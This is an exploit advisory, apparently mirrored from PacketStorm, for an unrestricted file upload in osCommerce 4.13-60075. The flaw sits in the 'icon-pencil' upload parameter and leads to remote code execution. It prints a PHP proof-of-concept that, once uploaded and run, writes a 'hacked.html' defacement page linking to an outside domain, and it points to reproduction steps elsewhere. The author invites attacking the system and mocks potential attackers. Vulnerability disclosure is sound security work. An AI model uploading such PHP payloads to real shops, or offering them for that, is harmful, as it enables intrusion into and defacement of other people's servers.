Share
## https://sploitus.com/exploit?id=PACKETSTORM:176233
## Title: osCommerce 4.13-60075 File-Upload-RCE  
## Author: nu11secur1ty  
## Date: 12/14/2023  
## Vendor: https://www.oscommerce.com/  
## Software: https://www.oscommerce.com/download-file  
## Reference: https://portswigger.net/web-security/file-upload  
  
  
## Description:  
The parameter "icon-pencil" in the upload-file dz-clickable function  
is vulnerable for File upload and Remote Code Execution then!  
The attacker easily can destroy this system if he is a kracker, grey  
hat, or some kind of stupid kid. More:  
{https://portswigger.net/web-security/file-upload}. In this scenario,  
I just uploaded a PHP exploit which created a second file directly on  
the server and then I executed it DIRECTLY on the  
server, by using just a browser. This can be executed with more  
methods but we can talk about it later. =)  
  
  
STATUS: CRITICAL Vulnerability  
  
[+]Exploit:  
```  
<?php  
// @nu11secur1ty 2023  
$myfile = fopen("hacked.html", "w") or die("Unable to open file!");  
  
$txt = "<p>You are hacked</p>\n";  
fwrite($myfile, $txt);  
$txt = "<p><p>This is not good for you</p>\n<a  
href='https://sell.sawbrokers.com/domain/malicious.com/'target='_blank'>You  
can visit our website for more information!</a></p>\n";  
  
  
fwrite($myfile, $txt);  
fclose($myfile);  
?>  
```  
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oscommerce.com/osCommerce-4.13-60075)  
  
## Proof and Exploit:  
[href](https://www.nu11secur1ty.com/2023/12/oscommerce-413-60075-file-upload-rce.html)  
  
## Time spent:  
00:15:00